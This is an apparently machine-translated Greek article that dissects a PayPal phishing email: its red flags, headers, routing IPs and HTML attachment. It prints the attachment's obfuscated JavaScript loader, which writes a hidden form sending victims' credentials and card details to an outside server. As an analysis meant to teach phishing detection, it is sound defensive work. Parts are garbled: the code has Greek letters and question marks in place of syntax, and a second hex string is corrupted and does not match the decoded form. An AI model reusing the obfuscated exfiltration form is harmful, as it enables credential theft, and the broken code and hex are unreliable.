Στον σημερινό κόσμο όπου όλες οι πληροφορίες είναι συνδεδεμένες στο διαδίκτυο, το ηλεκτρονικό ψάρεμα (phishing) είναι μια από τις πιο δημοφιλείς και καταστροφικές επιθέσεις στο διαδίκτυο, επειδή μπορείτε πάντα να καθαρίσετε έναν ιό, αλλά εάν τα τραπεζικά σας στοιχεία έχουν κλαπεί, έχετε πρόβλημα. Ακολουθεί μια ανάλυση μιας τέτοιας επίθεσης που λάβαμε.
Μην νομίζετε ότι είναι μόνο τα τραπεζικά σας στοιχεία που είναι σημαντικά: τελικά, εάν κάποιος αποκτήσει τον έλεγχο της σύνδεσης του λογαριασμού σας, δεν γνωρίζει μόνο τις πληροφορίες που περιέχονται σε αυτόν τον λογαριασμό, αλλά οι πιθανότητες είναι ότι τα ίδια στοιχεία σύνδεσης μπορούν να χρησιμοποιηθούν σε διάφορα άλλα λογαριασμοί. Και αν θέσουν σε κίνδυνο τον λογαριασμό email σας, μπορούν να επαναφέρουν όλους τους άλλους κωδικούς πρόσβασης.
Επομένως, εκτός από τη διατήρηση ισχυρών και διαφορετικών κωδικών πρόσβασης, πρέπει πάντα να ψάχνετε για ψεύτικα μηνύματα ηλεκτρονικού ταχυδρομείου που μεταμφιέζονται ως το πραγματικό πράγμα. Ενώ οι περισσότερες απόπειρες ηλεκτρονικού ψαρέματος είναι ερασιτεχνικές, μερικές είναι αρκετά πειστικές, οπότε είναι σημαντικό να κατανοήσουμε πώς να τα αναγνωρίζουμε σε επίπεδο επιφάνειας καθώς και πώς λειτουργούν κάτω από την κουκούλα.
Εικόνα από ασηράπ
Εξετάζοντας τι υπάρχει στο Plain Sight
Το παράδειγμα ηλεκτρονικού ταχυδρομείου μας, όπως οι περισσότερες προσπάθειες ηλεκτρονικού ψαρέματος, σας "ειδοποιεί" για δραστηριότητα στον λογαριασμό σας στο PayPal, το οποίο, υπό κανονικές συνθήκες, θα ήταν ανησυχητικό. Έτσι, η παρότρυνση για δράση είναι να επαληθεύσετε / επαναφέρετε τον λογαριασμό σας υποβάλλοντας σχεδόν κάθε κομμάτι προσωπικών πληροφοριών που μπορείτε να σκεφτείτε. Και πάλι, αυτό είναι αρκετά τυπικό.
Ενώ υπάρχουν σίγουρα εξαιρέσεις, σχεδόν κάθε email ηλεκτρονικού ψαρέματος και απάτης είναι φορτωμένο με κόκκινες σημαίες απευθείας στο ίδιο το μήνυμα. Ακόμα κι αν το κείμενο είναι πειστικό, συνήθως μπορείτε να βρείτε πολλά λάθη που είναι γεμάτα σε όλο το σώμα των μηνυμάτων, τα οποία δείχνουν ότι το μήνυμα δεν είναι νόμιμο.
Το σώμα του μηνύματος
Με την πρώτη ματιά, αυτό είναι ένα από τα καλύτερα email ηλεκτρονικού ψαρέματος που έχω δει. Δεν υπάρχουν ορθογραφικά ή γραμματικά λάθη και η διατύπωση διαβάζεται σύμφωνα με αυτό που θα περίμενε κανείς. Ωστόσο, υπάρχουν μερικές κόκκινες σημαίες που μπορείτε να δείτε όταν εξετάζετε το περιεχόμενο λίγο πιο προσεκτικά.
- "Paypal" - Η σωστή περίπτωση είναι "PayPal" (κεφάλαιο P). Μπορείτε να δείτε ότι και οι δύο παραλλαγές χρησιμοποιούνται στο μήνυμα. Οι εταιρείες είναι πολύ σκόπιμες με την επωνυμία τους, οπότε είναι αμφίβολο κάτι τέτοιο να περάσει τη διαδικασία ελέγχου.
- "Allow ActiveX" - Πόσες φορές έχετε δει μια νόμιμη επιχείρηση βάσει διαδικτύου το μέγεθος του Paypal χρησιμοποιεί ένα ιδιόκτητο στοιχείο που λειτουργεί μόνο σε ένα πρόγραμμα περιήγησης, ειδικά όταν υποστηρίζουν πολλαπλά προγράμματα περιήγησης; Σίγουρα, κάπου εκεί έξω κάποια εταιρεία το κάνει, αλλά αυτή είναι μια κόκκινη σημαία.
- "ασφαλώς." - Παρατηρήστε πώς αυτή η λέξη δεν ευθυγραμμίζεται στο περιθώριο με το υπόλοιπο κείμενο της παραγράφου. Ακόμα κι αν τεντώσω λίγο το παράθυρο, δεν τυλίγει ή χωρίζει σωστά.
- "Paypal!" - Ο χώρος πριν από το θαυμαστικό φαίνεται αδέξιος. Ακόμα ένα άλλο παράξενο που είμαι σίγουρος ότι δεν θα ήταν σε ένα νόμιμο email.
- "PayPal- Φόρμα ενημέρωσης λογαριασμού.pdf.htm" - Γιατί το Paypal επισυνάπτει ένα "PDF" ειδικά όταν θα μπορούσαν απλώς να συνδέονται με μια σελίδα στον ιστότοπό τους; Επιπλέον, γιατί θα προσπαθούσαν να συγκαλύψουν ένα αρχείο HTML ως PDF; Αυτή είναι η μεγαλύτερη κόκκινη σημαία όλων αυτών.
Η κεφαλίδα του μηνύματος
Όταν ρίξετε μια ματιά στην κεφαλίδα του μηνύματος, εμφανίζονται μερικές ακόμη κόκκινες σημαίες:
- Η διεύθυνση από είναι τεστ@τεστ.κομ .
- Λείπει η διεύθυνση. Δεν το ξεκαθάρισα, απλά δεν είναι μέρος της τυπικής κεφαλίδας μηνύματος. Συνήθως μια εταιρεία που έχει το όνομά σας θα εξατομικεύσει το email σας.
Το προσάρτημα
Όταν ανοίγω το συνημμένο, μπορείτε να δείτε αμέσως ότι η διάταξη δεν είναι σωστή καθώς λείπουν πληροφορίες στυλ. Και πάλι, γιατί το PayPal θα στέλνει μέσω ηλεκτρονικού ταχυδρομείου μια φόρμα HTML όταν θα μπορούσαν απλά να σας δώσουν έναν σύνδεσμο στον ιστότοπό τους;
Σημείωση: χρησιμοποιήσαμε το ενσωματωμένο πρόγραμμα προβολής συνημμένων HTML του Gmail για αυτό, αλλά συνιστούμε να ΜΗΝ ΑΝΟΙΖΕΤΕ συνημμένα από απατεώνες. Ποτέ. Πάντα. Πολύ συχνά περιέχουν εκμεταλλεύσεις που θα εγκαταστήσουν trojans στον υπολογιστή σας για να κλέψουν τα στοιχεία του λογαριασμού σας.
Κάνοντας κύλιση προς τα κάτω λίγο περισσότερο, μπορείτε να δείτε ότι αυτή η φόρμα ζητά όχι μόνο τα στοιχεία σύνδεσης στο PayPal, αλλά και τραπεζικές και πιστωτικές κάρτες. Μερικές από τις εικόνες είναι σπασμένες.
Είναι προφανές ότι αυτή η απόπειρα ηλεκτρονικού ψαρέματος ακολουθεί τα πάντα με μια κίνηση
Η τεχνική ανάλυση
Παρόλο που θα πρέπει να είναι αρκετά σαφές με βάση αυτό που είναι σαφές ότι πρόκειται για μια απόπειρα ηλεκτρονικού ψαρέματος (phishing), πρόκειται τώρα να καταρρίψουμε την τεχνική σύνθεση του email και να δούμε τι μπορούμε να βρούμε.
Πληροφορίες από το συνημμένο
Το πρώτο πράγμα που πρέπει να ρίξετε μια ματιά είναι η πηγή HTML της φόρμας συνημμένου που είναι αυτή που υποβάλλει τα δεδομένα στον ψεύτικο ιστότοπο.
Όταν προβάλλετε γρήγορα την πηγή, όλοι οι σύνδεσμοι εμφανίζονται έγκυροι καθώς οδηγούν είτε στο "paypal.com" είτε στο "paypalobjects.com" που είναι και οι δύο νόμιμοι.
Τώρα πρόκειται να ρίξουμε μια ματιά σε μερικές βασικές πληροφορίες σελίδας που συγκεντρώνει ο Firefox στη σελίδα.
Όπως μπορείτε να δείτε, μερικά από τα γραφικά αντλούνται από τους τομείς "lucktobe.com", "goodhealthpharmacy.com" και "pic-upload.de" αντί για τους νόμιμους τομείς PayPal.
Πληροφορίες από τις κεφαλίδες email
Στη συνέχεια θα ρίξουμε μια ματιά στις αρχικές κεφαλίδες μηνυμάτων email. Το Gmail το καθιστά διαθέσιμο μέσω της επιλογής Εμφάνιση αρχικού μενού στο μήνυμα.
Κοιτάζοντας τις πληροφορίες κεφαλίδας για το αρχικό μήνυμα, μπορείτε να δείτε ότι αυτό το μήνυμα συντάχθηκε χρησιμοποιώντας το Outlook Express 6. Αμφιβάλλω ότι το PayPal έχει κάποιο προσωπικό που στέλνει κάθε ένα από αυτά τα μηνύματα χειροκίνητα μέσω ενός ξεπερασμένου πελάτη email.
Τώρα κοιτάζοντας τις πληροφορίες δρομολόγησης, μπορούμε να δούμε τη διεύθυνση IP του αποστολέα και του διακομιστή αλληλογραφίας αναμετάδοσης.
Η διεύθυνση IP «Χρήστης» είναι αρχικός αποστολέας. Κάνοντας μια γρήγορη αναζήτηση στις πληροφορίες IP, μπορούμε να δούμε ότι το IP αποστολής βρίσκεται στη Γερμανία.
Και όταν κοιτάξουμε τον διακομιστή αναμετάδοσης αλληλογραφίας (mail.itak.at), τη διεύθυνση IP μπορούμε να δούμε ότι αυτός είναι ένας ISP που εδρεύει στην Αυστρία. Αμφιβάλλω ότι το PayPal δρομολογεί τα email τους απευθείας μέσω ενός ISP με έδρα την Αυστρία όταν έχουν ένα τεράστιο σύμπλεγμα διακομιστών που θα μπορούσε εύκολα να χειριστεί αυτήν την εργασία.
Πού πηγαίνουν τα δεδομένα;
Έτσι, έχουμε προσδιορίσει με σαφήνεια ότι πρόκειται για ηλεκτρονικό ταχυδρομείο ηλεκτρονικού ψαρέματος (phishing) και έχουμε συγκεντρώσει ορισμένες πληροφορίες σχετικά με την προέλευση του μηνύματος, αλλά τι γίνεται με την αποστολή των δεδομένων σας;
Για να το δούμε αυτό, πρέπει πρώτα να αποθηκεύσουμε το συνημμένο HTM στην επιφάνεια εργασίας μας και να το ανοίξουμε σε ένα πρόγραμμα επεξεργασίας κειμένου. Πραγματοποιώντας κύλιση σε αυτό, όλα φαίνεται να είναι εντάξει, εκτός εάν φτάσουμε σε ένα ύποπτο μπλοκ Javascript.
Διασπώντας την πλήρη πηγή του τελευταίου μπλοκ του Javascript, βλέπουμε:
<script language = "JavaScript" type = "text / javascript">
// Πνευματικά δικαιώματα © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =»3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e»? y =»? για (i = 0? θ <x.length? i + = 2) {y+=unescape(‘%’+x.substr(i,2));}document.write (y)?
</script>
Κάθε φορά που βλέπετε μια μεγάλη αλλοιωμένη σειρά φαινομενικά τυχαίων γραμμάτων και αριθμών ενσωματωμένων σε ένα μπλοκ Javascript, είναι συνήθως κάτι ύποπτο. Κοιτάζοντας τον κώδικα, η μεταβλητή "x" ορίζεται σε αυτήν τη μεγάλη συμβολοσειρά και στη συνέχεια αποκωδικοποιείται στη μεταβλητή "y". Το τελικό αποτέλεσμα της μεταβλητής "y" στη συνέχεια γράφεται στο έγγραφο ως HTML.
Δεδομένου ότι η μεγάλη συμβολοσειρά αποτελείται από τους αριθμούς 0-9 και τα γράμματα a-f, πιθανότατα κωδικοποιείται μέσω μιας απλής μετατροπής ASCII σε Hex:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f2f7777772e64657870626f737267327f2e64657870626f737267327f2e646578706f73726732742f73742220616374696f6e3d22687474703a2f2f2f7777772e646578706f737267327f57e646578703a2f2f2f7777772f57706
Τρανσλάτες το:
<form name = "main" id = "main" method = "post" action = "http://www.dexposure.net/bbs/data/verify.php">
Δεν είναι τυχαίο ότι αυτό αποκωδικοποιείται σε μια έγκυρη ετικέτα φόρμας HTML που στέλνει τα αποτελέσματα όχι στο PayPal, αλλά σε έναν αδίστακτο ιστότοπο.
Επιπλέον, όταν προβάλλετε την πηγή HTML της φόρμας, θα δείτε ότι αυτή η ετικέτα φόρμας δεν είναι ορατή επειδή δημιουργείται δυναμικά μέσω του Javascript. Αυτός είναι ένας έξυπνος τρόπος για να αποκρύψετε αυτό που κάνει πραγματικά το HTML εάν κάποιος απλώς δει την δημιουργημένη πηγή του συνημμένου (όπως κάναμε νωρίτερα) σε αντίθεση με το άνοιγμα του συνημμένου απευθείας σε ένα πρόγραμμα επεξεργασίας κειμένου.
Εκτελώντας ένα γρήγορο whois στον προσβλητικό ιστότοπο, μπορούμε να δούμε ότι αυτός είναι ένας τομέας που φιλοξενείται σε έναν δημοφιλή οικοδεσπότη Ιστού, 1 και 1.
Αυτό που ξεχωρίζει είναι ότι ο τομέας χρησιμοποιεί ένα αναγνώσιμο όνομα (σε αντίθεση με κάτι σαν "dfh3sjhskjhw.net") και ο τομέας έχει καταχωριστεί για 4 χρόνια. Εξαιτίας αυτού, πιστεύω ότι αυτός ο τομέας παραβιάστηκε και χρησιμοποιήθηκε ως πιόνι σε αυτήν την απόπειρα ηλεκτρονικού ψαρέματος.
Ο κυνισμός είναι μια καλή άμυνα
Όταν πρόκειται να παραμείνουμε ασφαλείς στο διαδίκτυο, δεν πονάει ποτέ να έχεις καλό κυνισμό.
Ενώ είμαι βέβαιος ότι υπάρχουν περισσότερες κόκκινες σημαίες στο παράδειγμα email, αυτό που έχουμε επισημάνει παραπάνω είναι δείκτες που είδαμε μετά από λίγα λεπτά εξέτασης. Υποθετικά, εάν το επίπεδο επιφάνειας του email μίμιζε το νόμιμο αντίστοιχό του κατά 100%, η τεχνική ανάλυση θα αποκάλυπτε ακόμη την πραγματική της φύση. Αυτός είναι ο λόγος για τον οποίο είναι σημαντικό να μπορείτε να εξετάσετε τόσο τι μπορείτε και δεν μπορείτε να δείτε.
